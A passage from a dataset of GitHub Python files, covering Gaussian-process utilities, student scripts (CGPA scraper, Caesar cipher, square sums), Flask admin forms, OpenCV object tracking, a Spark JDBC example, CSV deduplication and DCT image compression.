+ _A@s) \n \n _sol = solve_ivp(_Gt, \n [_T, 0], \n np.array([0, 0, _beta * _c]), \n t_eval = _ts[::-1])\n _Gt = _sol.y\n \n return _Gt, _ts\n\nclass ExactGPModel(gpytorch.models.ExactGP):\n def __init__(self, train_x, train_y, likelihood, training_iterations):\n# likelihood = gpytorch.likelihoods.GaussianLikelihood()\n super(ExactGPModel, self).__init__(train_x, train_y, likelihood)\n self.mean_module = gpytorch.means.ConstantMean()\n self.covar_module = gpytorch.kernels.ScaleKernel(gpytorch.kernels.RBFKernel(l=0.01))\n self.likelihood = likelihood\n self.reward_observation_times = []\n self.train_x = train_x\n self.train_y = train_y\n self.training_iterations = training_iterations\n def forward(self, x):\n mean_x = self.mean_module(x)\n covar_x = self.covar_module(x)\n return gpytorch.distributions.MultivariateNormal(mean_x, covar_x)\n \n def trainn(self):\n # Find optimal model hyperparameters\n self.train()\n self.likelihood.train()\n \n # Use the adam optimizer\n optimizer = torch.optim.Adam(self.parameters(), lr=0.1) # Includes GaussianLikelihood parameters\n #\n # \"Loss\" for GPs - the marginal log likelihood\n mll = gpytorch.mlls.ExactMarginalLogLikelihood(self.likelihood, self)\n \n for i in range(self.training_iterations):\n optimizer.zero_grad()\n output = self(self.train_x)\n loss = -mll(output, self.train_y)\n loss.backward()\n optimizer.step()\n \ndef add_fwd_cols(all_fwd_cols, _LOB_features):\n for col in all_fwd_cols:\n fwd_w = int(col.split('_')[-1])\n _LOB_features[col] = _LOB_features['mid_price'].diff(fwd_w).shift(-fwd_w)\n \ndef updatePLT(W, l=4, w=3, fontsize=10):\n plt.rcParams.update({\n 'figure.figsize': (W, W/(l/w)), # 4:3 aspect ratio\n 'font.size' : fontsize, # Set font size to 11pt\n 'axes.labelsize': fontsize, # -> axis labels\n 'legend.fontsize': fontsize, # -> legends\n 'font.family': 'lmodern',\n 'text.usetex': True,\n 'text.latex.preamble': ( # LaTeX preamble\n r'\\usepackage{lmodern}'\n # ... more packages if needed\n )\n })\n \n","repo_name":"FDR0903/execution_latent_signals","sub_path":"nb/GPutils.py","file_name":"GPutils.py","file_ext":"py","file_size_in_byte":3033,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"17648811443","text":"import sys\n\nn = None\ntry:\n n = int(input(\"n = \"))\nexcept ValueError:\n print(\"Nem számot adtál meg!\")\n sys.exit()\n\nosszeg = 0\n\nfor i in range(1, n, 1):\n \n # Összeadja a négyzetszámokat\n osszeg += i * i\n\n # Négyzetre emel\n i * i\n\n# Kiírja az átlagukat\nprint(osszeg / n)","repo_name":"tothm23/programozasi_alapok_BM","sub_path":"1019/negyzetszam.py","file_name":"negyzetszam.py","file_ext":"py","file_size_in_byte":299,"program_lang":"python","lang":"hu","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"4810192130","text":"'''\n*A script which can be used by svceians\n*This is an automted python script to calculate your CGPA directly from your cms.\n*Provided that you have to enter your cms login_id and password.\n___________________________________________________________________________________________\nPackages needed to run the script:\n-> selenium\n-> chrome|firefox webdriver\n-> BeautifulSoup\n___________________________________________________________________________________________\nKEY Feature\nCGPA Predicter:\n *How much grade you have to get in the subjects of current sem to achieve your dream CGPA\nWeb APP with these implementations.\n\n'''\n\n#necessary packages were imported selenium and BeautifulSoup\nfrom selenium import webdriver\nfrom selenium.webdriver.common.keys import Keys\nfrom selenium.webdriver.support.ui import WebDriverWait\nimport time\nfrom bs4 import BeautifulSoup\n\n#Upto which semester cgpa you need: enter here\nglobal I #This is assigned as a global variable \nsem = []\nprint('Enter your admission number(2016cse08xx):')\narr = input().upper()\nprint('')\nprint('Enter your Password:')\nu1 = input('pass')\nprint('------------------------------------------------------------------')\nprint('')\nprint('CGPA of Which Semester Wanted:')\nprint('Note::: Please ensure that you cms have the data till the sem number you are entering ')\nI = int(input()) + 1\n\n#Hit the webdriver\nbrowser = webdriver.Chrome()\nbrowser.get(\"https://cms.svce.ac.in/\") \ntime.sleep(2)\n\n#Enter User Credentials\nuser_id = 'ST'+arr+'.SVCE'\npasscode = u1\n\n#user_name and password field in the webpage is found using ID\nusername = browser.find_element_by_id(\"userName\")\npassword = browser.find_element_by_id(\"hashedpassword\")\n\n#Passing the user values\nusername.send_keys(user_id)\npassword.send_keys(passcode)\n\n#Entering values of submit button\nlogin_attempt = browser.find_element_by_xpath(\"//*[@type='submit']\")\nlogin_attempt.submit()\n\n#according to cms the university result field is hit for no of I semesters needed\nfor i in range(1,I):\n query = 'Semester '+ str(i)\n#much needed and important try and catch block to wait for all the operations to complete \n try:\n \n b = browser.find_element_by_xpath(\"//select[@id='semesterDropDown1']/option[text()='\" + query + \"']\").click()\n time.sleep(3)\n except:\n pass\n \n #page source code is parsed to BeautifulSoup\n page = browser.page_source\n soup = BeautifulSoup(page)\n unimark = soup.find(lambda tag: tag.name=='div' and tag.has_attr('id') and tag['id']==\"University_Mark\") \n \n rows = unimark.find('tbody')\n #Appending the subject code and grade of each subject to the list\n se = []\n for sr in rows.findAll('td'):\n\n if len(sr.text) <= 8 or len(sr.text) == 1:\n se.append(sr.text)\n sem.append(se)\n \n \n \n \n#Hit thi)s page to get the subject details and credits\nbrowser.get('https://cms.svce.ac.in/studentSubjectDetails')\npage = browser.page_source\nsoup = BeautifulSoup(page)\nunimark = soup.find(lambda tag: tag.name=='section' and tag.has_attr('id') and tag['id']==\"content\") \n\nrows = unimark.find('tbody')\n#Appending credits and subject codes to list c\nc = []\nfor sr in rows.findAll('td'):\n if len(sr.text) <= 8 or len(sr.text) == 1 or len(sr.text) == 2:\n c.append(sr.text)\n \n#converting the list c to dict\ncredits = dict(zip(c[::2], c[1::2]))\n\n#fisplit is the final splitup in where subject code , grades,marks are being matched\nlast = []\nfor i in sem:\n lee = []\n for j in range(0,len(i),2):\n li = []\n li.append(i[j])\n li.append(credits[i[j]])\n li.append(i[j+1])\n lee.append(li)\n last.append(lee)\n\n\n#function to calculate CGPA and GPA \ndef cal(sub):\n num = 0\n den = 0\n cgpa = 0\n \n for ent in sub:\n den += int(ent[1] )\n if ent[2].lower() == 's':\n num = num + 10*int(ent[1])\n elif ent[2].lower() == 'a':\n num = num + 9*int(ent[1])\n elif ent[2].lower() == 'b':\n num = num + 8*int(ent[1])\n elif ent[2].lower() == 'c':\n num = num + 7*int(ent[1])\n elif ent[2].lower() == 'd':\n num = num + 6*int(ent[1])\n elif ent[2].lower() == 'e':\n num = num + 5*int(ent[1])\n else:\n continue\n global den_c\n global num_c\n \n den_c += den\n num_c += num\n #For GPA Estimator\n n_g.append(num)\n d_g.append(den)\n n_cg.append(num_c)\n d_cg.append(den_c)\n gpa1 = num/den\n cgpa1 = num_c/den_c\n g.append(gpa1)\n cg.append(cgpa1)\n\n gpa = round(num/den,2)\n cgpa = round(num_c/den_c,2)\n print('GPA in SEM'+str(i+1)+':'+str(gpa))\n \n\n return [gpa,cgpa]\n#Function for CGPA Estimator\ndef run(exp,cc,s):\n exp = float(exp)\n cc = int(cc)\n s= int(s)\n \n s = s-1\n anz = (((exp * float(d_cg[s])) - float(n_cg[s-1]))/cc)\n anzz = anz*cc\n if(anz <= 10 and anz >= 5):\n print('You have to score the GPA of : ' + str(round(anz,2))+' in sem '+str(esti)+' to get your Dream CGPA')\n else:\n print('Sorry Folks, Its not possible to achieve this CGPA..')\n print('You either would have entered a higher cgpa or a lesser which you cant get ')\n \n return [anz,anzz]\n\nden_c = 0\nnum_c = 0\ncgpa = 0\nd_g = []\nn_g = []\nd_cg = []\nn_cg = []\ng = []\ncg = []\n#All of those for this small piece \nfor i in range(len(last)):\n result = cal(last[i])\nprint('____________________________')\nprint('FINAL CGPA:'+ str(result[1]))\nprint('____________________________')\nprint('')\nprint('')\nprint('------------------------------------------------------------------------------------')\nprint('---------------------------NEW FETURE-----------------------------------------------')\nprint('------------------------------------------------------------------------------------')\nprint('You can now estimate how much GPA you need to get in a semester to get your dream CGPA ')\nprint('Example: I wrote till 5th semester and i have the data of subjects and marks till sem5 in my cms')\nprint('and i want to know, how much GPA do I have to get in SEM-6 to get 9.5?')\nprint('Well Its Possible here')\nprint('------------------------------------------------------------------------------------')\nprint('------------------------------------------------------------------------------------')\nprint('------------------------------------------------------------------------------------')\n\nxx = 0\nesti = input('Enter The Semester Number for which you want to know the estimate:')\ncc = input('Total Number of credits in the semester usually(25 or 23): ')\n\ndef ulti():\n exp = input('Enter your dream CGPA:')\n if int(esti) <= len(d_cg):\n run(exp,cc,esti)\n\n elif int(esti) == (len(d_cg)+1):\n d_cg.append(d_cg[int(esti) - 2] + int(cc) )\n\n lulu = run(exp,cc,esti)\n #print('You have to score the GPA of in sem ' +str(esti)+str(lulu[0])+' to get your Dream CGPA')\n\n d_cg.remove(d_cg[-1])\n else:\n print('Not enough data to process your request')\n print('The Data Scrapped is till sem '+str(len(n_cg)) )\n return\n\nwhile xx == 0:\n ulti()\n print('')\n print('Press 0 to continue and 1 to exit')\n xx += int(input())\n\n\n \n\n\n\n\n\n\n\n\n","repo_name":"vigneshdurairaj/C-kal_SVCE","sub_path":"SVCE_CGPA.py","file_name":"SVCE_CGPA.py","file_ext":"py","file_size_in_byte":7286,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"19995024238","text":"# -*- coding: utf-8 -*\n# Author: Alex Cater\n\"\"\"\n# @Author :Alex Cater\n# @Time : 2020/8/14 21:35\n# @File : forms.py\n\"\"\"\nfrom flask_wtf import FlaskForm\nfrom wtforms import StringField, PasswordField, SubmitField, SelectMultipleField, SelectField,DateTimeField\nfrom wtforms.validators import DataRequired, EqualTo, ValidationError\n\nfrom app.models import Admin, Auth, Role,Machineroom,Machine,Platform\n\n\nclass LoginForm(FlaskForm):\n \"\"\"管理员登录表单\"\"\"\n account = StringField(\n label=\"账号\",\n validators=[\n DataRequired(\"请输入账号!\")\n ],\n description=\"账号\",\n render_kw={\n \"class\": \"form-control\",\n \"placeholder\": \"请输入账号!\",\n\n }\n )\n pwd = PasswordField(\n label=\"密码\",\n validators=[\n DataRequired(\"请输入密码!\")\n ],\n description=\"密码\",\n render_kw={\n \"class\": \"form-control\",\n \"placeholder\": \"请输入密码!\",\n\n }\n )\n submit = SubmitField(\n '登录',\n render_kw={\n \"class\": \"btn btn-primary btn-block btn-flat\",\n }\n )\n\n def validate_account(self, field):\n account = field.data\n # 查询账号并统计有几条\n admin = Admin.query.filter_by(name=account).count()\n if admin == 0:\n raise ValidationError(\"���号不存在!\")\n\n\nclass PwdForm(FlaskForm):\n \"\"\"修改密码表单\"\"\"\n old_pwd = PasswordField(\n label=\"旧密码\",\n validators=[\n DataRequired(\"请输入旧密码!\")\n ],\n description=\"旧密码\",\n render_kw={\n \"class\": \"form-control\",\n \"placeholder\": \"请输入旧密码!\",\n }\n )\n new_pwd = PasswordField(\n label=\"新密码\",\n validators=[\n DataRequired(\"请输入新密码!\")\n ],\n description=\"新密码\",\n render_kw={\n \"class\": \"form-control\",\n \"placeholder\": \"请输入新密码!\",\n }\n )\n submit = SubmitField(\n '编辑',\n render_kw={\n \"class\": \"btn btn-primary\",\n }\n )\n\n def validate_old_pwd(self, field):\n from flask import session\n pwd = field.data\n name = session[\"admin\"]\n admin = Admin.query.filter_by(\n name=name\n ).first()\n if not admin.check_pwd(pwd):\n raise ValidationError(\"旧密码错误!\")\n\nclass MachineForm(FlaskForm):\n name = StringField(\n label=\"机器名称\",\n validators=[\n DataRequired(\"请输入机器名称!\")\n ],\n description=\"机器名称\",\n render_kw={\n \"class\": \"form-control\",\n \"placeholder\": \"请输入机器名称!\",\n }\n )\n url = StringField(\n label=\"机器IP\",\n validators=[\n DataRequired(\"请输入机器IP!\")\n ],\n description=\"机器IP\",\n render_kw={\n \"class\": \"form-control\",\n \"placeholder\": \"请输入机器IP!\",\n }\n )\n CPU = StringField(\n label=\"CPU型号\",\n description=\"CPU型号\",\n render_kw={\n \"class\": \"form-control\",\n \"placeholder\": \"请输入CPU型号!\",\n }\n )\n RAM = StringField(\n label=\"内存容量\",\n validators=[\n DataRequired(\"请输入内存容量!\")\n ],\n description=\"内存容量\",\n render_kw={\n \"class\": \"form-control\",\n \"placeholder\": \"请输入内存容量!\",\n }\n )\n IPMI = StringField(\n label=\"IPMI地址\",\n validators=[\n DataRequired(\"请输入IPMI地址!\")\n ],\n description=\"IPMI地址\",\n render_kw={\n \"class\": \"form-control\",\n \"placeholder\": \"请输入IPMI地址!\",\n }\n )\n machineroom_id = SelectField(\n label=\"所属机房\",\n coerce=int,\n choices=[(v.id, v.name) for v in Machineroom.query.all()],\n render_kw={\n \"class\": \"form-control\",\n }\n )\n platform_id = SelectField(\n label=\"所属平台\",\n coerce=int,\n choices=[(v.id, v.name) for v in Platform.query.all()],\n render_kw={\n \"class\": \"form-control\",\n }\n )\n putontime = StringField(\n label=\"上架时间\",\n validators=[\n DataRequired(\"请选择上架时间!\")\n ],\n description=\"上架时间\",\n render_kw={\n \"class\": \"form-control\",\n \"placeholder\": \"请选择上架时间!\",\n \"id\": \"input_release_time\"\n }\n )\n submit = SubmitField(\n '提交',\n render_kw={\n \"class\": \"btn btn-primary\",\n }\n )\n\n\n\nclass AuthForm(FlaskForm):\n name = StringField(\n label=\"权限名称\",\n validators=[\n DataRequired(\"请输入权限名称!\")\n ],\n description=\"权限名称\",\n render_kw={\n \"class\": \"form-control\",\n \"placeholder\": \"请输入权限名称!\"\n }\n )\n url = StringField(\n label=\"权限地址\",\n validators=[\n DataRequired(\"请输入权限地址!\")\n ],\n description=\"权限地址\",\n render_kw={\n \"class\": \"form-control\",\n \"placeholder\": \"请输入权限地址!\"\n }\n )\n submit = SubmitField(\n '编辑',\n render_kw={\n \"class\": \"btn btn-primary\",\n }\n )\n\n\nclass RoleForm(FlaskForm):\n name = StringField(\n label=\"角色名称\",\n validators=[\n DataRequired(\"请输入角色名称!\")\n ],\n description=\"角色名称\",\n render_kw={\n \"class\": \"form-control\",\n \"placeholder\": \"请输入角色名称!\"\n }\n )\n auths = SelectMultipleField(\n label=\"权限列表\",\n validators=[\n DataRequired(\"请选择权限列表!\")\n ],\n coerce=int,\n choices=[(v.id, v.name) for v in Auth.query.all()],\n description=\"权限列表\",\n render_kw={\n \"class\": \"form-control\",\n }\n )\n submit = SubmitField(\n '编辑',\n render_kw={\n \"class\": \"btn btn-primary\",\n }\n )\n\n\nclass AdminForm(FlaskForm):\n name = StringField(\n label=\"管理员名称\",\n validators=[\n DataRequired(\"请输入管理员名称!\")\n ],\n description=\"管理员名称\",\n render_kw={\n \"class\": \"form-control\",\n \"placeholder\": \"请输入管理员名称!\",\n }\n )\n pwd = PasswordField(\n label=\"管理员密码\",\n validators=[\n DataRequired(\"请输入管理员密码!\")\n ],\n description=\"管理员密码\",\n render_kw={\n \"class\": \"form-control\",\n \"placeholder\": \"请输入管理员密码!\",\n }\n )\n repwd = PasswordField(\n label=\"管理员重复密码\",\n validators=[\n DataRequired(\"请输入管理员重复密码!\"),\n EqualTo('pwd', message=\"两次密码不一致!\")\n ],\n description=\"管理员重复密码\",\n render_kw={\n \"class\": \"form-control\",\n \"placeholder\": \"请输入管理员重复密码!\",\n }\n )\n role_id = SelectField(\n label=\"所属角色\",\n coerce=int,\n choices=[(v.id, v.name) for v in Role.query.all()],\n render_kw={\n \"class\": \"form-control\",\n }\n )\n submit = SubmitField(\n '编辑',\n render_kw={\n \"class\": \"btn btn-primary\",\n }\n )\n","repo_name":"1458206584/Machine_Admin","sub_path":"app/admin/forms.py","file_name":"forms.py","file_ext":"py","file_size_in_byte":7770,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"37808545692","text":"import cv2\nimport numpy as np\nimport math\n\n\n# when started put object to track into smaller rectangle and press space\n# to end press ESC\n\ndef get_back_histogram(image, hist):\n disc = cv2.getStructuringElement(cv2.MORPH_ELLIPSE, (27, 27))\n struct_element = cv2.calcBackProject([image], [0, 1], hist, [0, 150, 0, 256], 1)\n cv2.filter2D(struct_element, -1, disc, struct_element)\n return struct_element\n\n\ndef calculate_center(best_contour, last_center):\n centroid = cv2.moments(best_contour)\n if centroid['m00'] != 0:\n x_dimension, y_dimension = (int(centroid['m10'] / centroid['m00']), int(centroid['m01'] / centroid['m00']))\n return x_dimension, y_dimension\n else:\n return last_center\n\n\ndef calculate_contours(histogram_mask):\n histogram_gray = cv2.cvtColor(histogram_mask, cv2.COLOR_BGR2GRAY)\n _, thresh = cv2.threshold(histogram_gray, 0, 255, 0)\n contour, _ = cv2.findContours(thresh, cv2.RETR_TREE, cv2.CHAIN_APPROX_SIMPLE)\n return contour\n\n\ndef masking_histogram(frame, histogram):\n frame_hsv = cv2.cvtColor(frame, cv2.COLOR_BGR2HSV)\n struct_element = get_back_histogram(frame_hsv, histogram)\n _, thresh = cv2.threshold(struct_element, 150, 255, cv2.THRESH_TOZERO)\n thresh = cv2.merge((thresh, thresh, thresh))\n return cv2.bitwise_and(thresh, frame)\n\n\nclass camera:\n first_place = []\n second_place = []\n\n def __init__(self):\n self.histogram_created_check = False\n\n self.histogram = None\n self.cap = cv2.VideoCapture(0)\n\n _, frame = self.cap.read()\n self.rows, self.cols, _ = frame.shape\n print(self.rows, self.cols)\n self.last_center = (int(self.rows / 2), int(self.cols / 2))\n\n def draw_place(self, frame):\n rows, cols, _ = frame.shape\n self.first_place = [(int(9.5 * cols / 20), int(9.5 * rows / 20)),\n (int(10.5 * cols / 20), int(10.5 * rows / 20))]\n cv2.rectangle(frame, self.first_place[0], self.first_place[1], (255, 0, 0))\n self.second_place = [(int(9 * cols / 20), int(7 * rows / 20)), (int(11 * cols / 20), int(13 * rows / 20))]\n cv2.rectangle(frame, self.second_place[0], self.second_place[1], (0, 0, 255))\n return frame\n\n def create_histogram(self, frame):\n hsv_frame = cv2.cvtColor(frame, cv2.COLOR_BGR2HSV)\n\n hsv_frame = hsv_frame[self.first_place[0][1]: self.first_place[1][1],\n self.first_place[0][0]: self.first_place[1][0]]\n\n histogram = cv2.calcHist([hsv_frame], [0, 1], None, [150, 256], [0, 150, 0, 256])\n\n return cv2.normalize(histogram, histogram, 0, 255, cv2.NORM_MINMAX), hsv_frame\n\n def scan_object_fast(self):\n\n while self.cap.isOpened():\n ret, frame = self.cap.read()\n\n frame = cv2.flip(frame, 1)\n\n if self.histogram_created_check is False:\n frame = self.draw_place(frame)\n\n cv2.namedWindow('Scan', cv2.WINDOW_NORMAL)\n\n if cv2.waitKey(1) & 0xFF == 32:\n self.histogram_created_check = True\n self.histogram, _ = self.create_histogram(frame)\n break\n cv2.destroyAllWindows()\n cv2.destroyAllWindows()\n return self.histogram\n\n def search_for_object(self):\n ret, frame = self.cap.read()\n\n frame = cv2.flip(frame, 1)\n\n frame = self.draw_place(frame)\n self.histogram, _ = self.create_histogram(frame)\n return frame\n\n def scan_object(self):\n ret, frame = self.cap.read()\n\n frame = cv2.flip(frame, 1)\n\n frame = self.draw_place(frame)\n\n if cv2.waitKey(1) & 0xFF == 32:\n self.histogram_created_check = True\n self.histogram, _ = self.create_histogram(frame)\n return frame\n\n def set_histogram_created_check_not(self):\n self.histogram_created_check = False\n\n def get_center(self):\n ret, frame = self.cap.read()\n\n frame = cv2.flip(frame, 1)\n\n if self.histogram_created_check:\n hist_masked_image = masking_histogram(frame, self.histogram)\n kernel = np.ones((5, 5), np.uint8)\n hist_masked_image = cv2.erode(hist_masked_image, kernel)\n hist_masked_image = cv2.dilate(hist_masked_image, kernel)\n contour_list = calculate_contours(hist_masked_image)\n try:\n max_cont = max(contour_list, key=cv2.contourArea)\n cnt_centroid = calculate_center(max_cont, self.last_center)\n if math.sqrt((self.last_center[0] - cnt_centroid[0]) ** 2 +\n (self.last_center[1] - cnt_centroid[1]) ** 2) > 100:\n cnt_centroid = self.last_center\n else:\n self.last_center = cnt_centroid\n except ValueError:\n # print(\"out\")\n cnt_centroid = self.last_center\n cv2.circle(frame, cnt_centroid, 5, [255, 0, 255], -1)\n else:\n frame = self.draw_place(frame)\n\n return frame, cnt_centroid\n\n def check_quality(self, frame):\n hist_masked_image = masking_histogram(frame, self.histogram)\n erode_kernel = np.ones((5, 5), np.uint8)\n dilate_kernel = np.ones((5, 5), np.uint8)\n hist_masked_image = cv2.erode(hist_masked_image, erode_kernel)\n hist_masked_image = cv2.dilate(hist_masked_image, dilate_kernel)\n contour_list = calculate_contours(hist_masked_image)\n return len(contour_list)\n\n\ndef main(): # This main is for test purpose only\n usage = camera()\n\n cv2.namedWindow('Scan', cv2.WINDOW_NORMAL)\n cv2.resizeWindow('Scan', 800, 600)\n while usage.histogram_created_check is False:\n frame = usage.scan_object()\n cv2.imshow('Scan', frame)\n cv2.destroyAllWindows()\n cv2.namedWindow('Live', cv2.WINDOW_NORMAL)\n cv2.resizeWindow('Live', 800, 600)\n while usage.cap.isOpened():\n img, _ = usage.get_center()\n cv2.imshow('Live', img)\n if cv2.waitKey(1) & 0xFF == 27:\n break\n\n usage.cap.release()\n cv2.destroyAllWindows()\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"wranidlo/Camera-Paint","sub_path":"camera/Camera.py","file_name":"Camera.py","file_ext":"py","file_size_in_byte":6143,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"52"} +{"seq_id":"71111670566","text":"string=str(input(\"input a String:\"))\r\nN=int(input(\"Enter length:\"))\r\nstring=string.lower()\r\nprint(\"Encrypted String:\",end='')\r\nfor c in string:\r\n asci=ord(c)\r\n if (asci>=97) & (asci <=122):\r\n asci+=N\r\n if asci>122:\r\n asci=asci%122 +96\r\n print(chr(asci),end='') ","repo_name":"AtriSaxena/CRYPTOGRAPHY","sub_path":"Ciphers/Cesar_Cipher/Cesar_cipher.py","file_name":"Cesar_cipher.py","file_ext":"py","file_size_in_byte":290,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"52"} +{"seq_id":"16840310509","text":"\"\"\"\n Appends content of a dataframe to a PostgreSQL database.\n Check for additional information in the README.md file in the same repository.\n\n @author rambabu.posa\n\"\"\"\nfrom pyspark.sql import SparkSession\nfrom pyspark.sql.types import (StructType, StructField,\n StringType,IntegerType)\n\ndef createDataframe(spark):\n # Create the schema\n schema = StructType([StructField('fname', StringType(), False),\n StructField('lname', StringType(), False),\n StructField('id', IntegerType(), False),\n StructField('score', IntegerType(), False)])\n # data to create a dataframe\n data = [\n (\"Matei\", \"Zaharia\", 34, 456),\n (\"Jean-Georges\", \"Perrin\", 23, 3),\n (\"Jacek\", \"Laskowski\", 12, 758),\n (\"Holden\", \"Karau\", 31, 369)\n ]\n return spark.createDataFrame(data, schema)\n\ndef main(spark):\n df = createDataframe(spark)\n df.show(truncate=False)\n\n # Write in a table called ch17_lab900_pkey\n df.write.mode(\"append\") \\\n .format(\"jdbc\") \\\n .option(\"url\", \"jdbc:postgresql://localhost/spark_labs\") \\\n .option(\"dbtable\", \"ch17_lab900_pkey\") \\\n .option(\"driver\", \"org.postgresql.Driver\") \\\n .option(\"user\", \"jgp\") \\\n .option(\"password\", \"Spark<3Java\") \\\n .save()\n\nif __name__ == \"__main__\":\n # Creates a session on a local master\n spark = SparkSession.builder \\\n .appName(\"Addition\") \\\n .master(\"local[*]\").getOrCreate()\n\n # setting log level, update this as per your requirement\n spark.sparkContext.setLogLevel(\"warn\")\n\n main(spark)\n spark.stop()\n\n\n","repo_name":"jgperrin/net.jgp.books.spark.ch17","sub_path":"src/main/python/lab900_append_primary_key/appendDataJdbcPrimaryKeyApp.py","file_name":"appendDataJdbcPrimaryKeyApp.py","file_ext":"py","file_size_in_byte":1668,"program_lang":"python","lang":"en","doc_type":"code","stars":10,"dataset":"github-code","pt":"52"} +{"seq_id":"17023397284","text":"import argparse\n\n#lấy tham số từ cmd\nparser = argparse.ArgumentParser()\nparser.add_argument('filename', help='input CSV file')\nparser.add_argument('--out', help='output CSV file')\n\nargs = parser.parse_args()\n\nfilename = args.filename\noutput = args.out\n\nwith open(filename, 'r') as f:\n data = f.read()\n\n# Phân tích chuỗi CSV và tìm tên cột và dữ liệu\nrows = data.split('\\n')\ncolumn_names = rows[0].split(',')\ndata = [row.split(',') for row in rows[1:] if row]\n\n#tạo 1 list chứa các row độc nhất từ data và chuyển giá trị từ list đó vào lại data\nunique_data = set(tuple(row) for row in data)\ndata = [list(row) for row in unique_data]\n\n#xuat file\nwith open(output, 'w') as f:\n \n for i in range(len(column_names)): \n if i == len(column_names) - 1:\n f.write(str(column_names[i]) + '\\n')\n else:\n f.write(str(column_names[i]) + ',')\n\n for row in data:\n row_str = \",\".join(map(str, row))\n f.write(row_str + \"\\n\")","repo_name":"Sury2511/Data-Preprocessing-and-Data-exploration","sub_path":"cau6.py","file_name":"cau6.py","file_ext":"py","file_size_in_byte":1016,"program_lang":"python","lang":"vi","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"40617088694","text":"import os \r\nimport numpy as np\r\nfrom skimage.color import rgb2gray\r\nfrom skimage import data, measure,io\r\nimport skimage as sk\r\nimport matplotlib.pyplot as plt\r\nfrom dct2 import dct2, idct2\r\nimport PIL as pil\r\nimport sys\r\n\r\n\r\n\r\nimg=io.imread('Im3Comp100.jpg')\r\nimg_gray = rgb2gray(img)\r\nimg_gray=sk.img_as_float(img_gray)\r\nplt.figure(1)\r\nplt.imshow(img_gray,cmap='gray')\r\nN = int(sys.argv[1])\r\nM = int(sys.argv[1])\r\nwindow_size = (N,M)\r\nimg_size=img_gray.shape\r\n\r\n\r\ndctblock=np.zeros(img_size)\r\nblock = np.zeros(window_size)\r\nprint(block.shape)\r\nprint(block.dtype)\r\n\r\n\r\n# table de quantification\r\nquant = np.zeros(window_size)\r\ncompr = N*M\r\nfor i in range(N):\r\n\tfor j in range(M):\r\n\t\tquant[i,j] = 1+(1+j+i)*compr\r\n\r\n#dct + quant\r\nfor i in range(0,img_size[0], N):\r\n\tfor j in range(0,img_size[1], M):\r\n\t\t# print(\"i : \"+str(i)+\" j : \"+str(j))\r\n\t\tblock_size = img_gray[i:i+N,j:j+M].shape\r\n\t\tblock[0:block_size[0],0:block_size[1]] = img_gray[i:i+N,j:j+M]\r\n\t\tblock = dct2(block)\r\n\t\tdctblock[i:i+N,j:j+M] = block[0:block_size[0],0:block_size[1]]/quant[0:block_size[0],0:block_size[1]]\r\n\r\n#image compr\r\nplt.figure(3)\r\nplt.imshow(np.log(1.0+dctblock),cmap='gray')\r\n\r\n#idct + iquant\r\nnewim=np.zeros(img_size)\r\nfor i in range(0,img_size[0], N):\r\n\tfor j in range(0,img_size[1], M):\r\n\t\t# print(\"i : \"+str(i)+\" j : \"+str(j))\r\n\t\tblock_size = dctblock[i:i+N,j:j+M].shape\r\n\t\tblock[0:block_size[0],0:block_size[1]] = dctblock[i:i+N,j:j+M]*quant[0:block_size[0],0:block_size[1]]\r\n\t\tblock = idct2(block)\r\n\t\tnewim[i:i+N,j:j+M] = block[0:block_size[0],0:block_size[1]]\r\n\r\n\r\n#psnr et ssim\r\npsnr=measure.compare_psnr(img_gray,newim,1.0)\r\nssim=measure.compare_ssim(img_gray,newim)\r\nprint(\"psnr : \"+str(psnr)+\" ssim : \"+str(ssim))\r\n\r\nplt.figure(4)\r\nnewim=np.ubyte(np.round(255.0*newim,0))\r\nplt.imshow(newim,cmap='gray')\r\n\r\nfich=open('madct.dat','wb')\r\nfich.write(np.reshape(newim,-1)) \r\nfich.close()\r\n\r\npsnr_tab = np.zeros(30)\r\nssim_tab = np.zeros(30)\r\nabs_tab = np.zeros(30)\r\ncompt=0\r\n\r\nfor qual in range(10,160,5):\r\n\r\n\tmonIm=pil.Image.fromarray(np.ubyte(np.round(255.0*img_gray,0)))\r\n\tmonIm.save('essai.jpeg',quality=qual)\r\n\r\n\timg_compr = io.imread(\"essai.jpeg\")\r\n\timg_compr = rgb2gray(img_compr)\r\n\timg_compr=sk.img_as_float(img_compr)\r\n\tpsnr_tab[compt]=measure.compare_psnr(img_gray,img_compr,1.0)\r\n\tssim_tab[compt]=measure.compare_ssim(img_gray,img_compr)\r\n\tabs_tab[compt] = qual\r\n\tcompt+=1\r\n\r\nplt.figure(5)\r\nplt.plot(abs_tab, psnr_tab)\r\nplt.figure(6)\r\nplt.plot(abs_tab, ssim_tab)\r\nprint( \"taille= \",os.path.getsize(\"essai.jpeg\"), \"en octet\")\r\nprint(\"compression =\", 1.0*img_size[0]*img_size[1]/os.path.getsize(\"essai.jpeg\"))\r\nplt.show()","repo_name":"JoffreyFerreira/TMA-DCT","sub_path":"TP_Python/Exemple_dct2.py","file_name":"Exemple_dct2.py","file_ext":"py","file_size_in_byte":2623,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"24861793578","text":"__author__ = 'Erik Rosales'\n\nfrom flask import Flask, render_template\nfrom flask_pymongo import PyMongo\n\napp = Flask(__name__)\napp.config['MONGO_URI'] = \"mongodb://localhost:27017/watchDb\"\n\n@app.route('/')\ndef index():\n return render_template('watch.html')\n\nif __name__ == \"__main__\":\n app.run()","repo_name":"erikfuego/WatchApp","sub_path":"src/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":301,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"52"} +{"seq_id":"1376920916","text":"import numpy as np\r\nimport csv\r\n\r\nwith open(\"articles.csv\") as d:\r\n reader=csv.reader(d)\r\n data=list(reader)\r\n articles=data[1:]\r\n\r\narticles.sort_values(by=\"total_events\", ascending=False)\r\n\r\noutput=list(articles[[\"url\", \"title\", \"text\", \"lang\", 